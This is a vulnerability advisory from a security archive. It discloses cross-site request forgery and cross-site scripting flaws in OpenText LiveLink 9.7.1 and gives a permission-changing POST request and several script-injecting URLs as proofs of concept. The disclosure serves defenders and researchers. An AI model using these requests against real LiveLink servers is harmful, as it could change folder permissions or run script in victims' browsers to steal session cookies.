OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting: Posted Sep 24, 2010; Authored by Alejandro Ramos; OpenText LiveLink version 9.7.1 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | ef01c4568616716b2c26548ba34937768a8c0ab27b5c987575fc127013dbe144; Download | Favorite | View

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

# Exploit Title: OpenText LiveLink multiple vulnerabilities (CSRF, XSS)
# Date: 22/06/2010
# Author: Alejandro Ramos <aramosf @ gmail.com>
# http://www.securitybydefault.com
# Software Link: http://www.opentext.com/
# Version: 9.7.1
# Tested on: Solaris

Opentext (NASDAQ OTEX) LiveLink 9.7.1

Livelink features several advanced foundational elements that allow
organizations to
apidly and easily enable advanced content management applications and solutions
throughout the enterprise.

CSRF:
Livelink ECM is prone to a cross-site request forgery vulnerability
because it fails
to properly sanitize data input.

An attacker may leverage this issue to change permissions of folders
or resources.

1.- POST Request:
https://host/func=ll&objAction=EditAcl2&objType=1&objID=514&nodeId=3083071&id=14&rightId=14&PermType=0&Root=&nextUrl2=&PermActionType=&See=on&SeeContent=on&Modify=on&EditAttr=on&Reserve=on&DeleteVersion=on&Delete=on&EditPerm=on

XSS:

Livelink ECM is prone to a cross-site scripting vulnerability because it fails
to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This may
help the attacker steal cookie-based authentication credentials and
launch other attacks.

1.- parameter: viewType
https://host/livelink/livelink?func=ll&objId=514&objAction=browse&viewType=aa"><script>alert(514)</script><img
src="

2,3,4.- parameters: nodeid, setctx, support
https://host/livelinkdav/nodes/OOB_DAVWindow.html?func=oobget&nodeid=514&support=/livelinksupport/&setctx=');alert('XSS');//514--idctx-12&ctxval=blahblah

5.- POST Request.-
https://host/livelink/livelink?func=ll.processAccept&objId=514&webDAVCacheID=1&cacheID=1&sysCacheID=0&nextUrl=/livelink/livelink%3Ffunc%3Dll%26objID%3D514%26objAction%3Dbrowse%26viewType%3D21

6.- parameter: sort
https://host/livelink/livelink?func=ll&objid=1&objAction=browse&sort=%22%3E%3Cscript%3Ealert%28514%29%3C/script%3E%3Cimg%20src=%22


-- 
Alejandro Ramos
http://www.securitybydefault.com

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

Share This

OpenText LiveLink 9.7.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems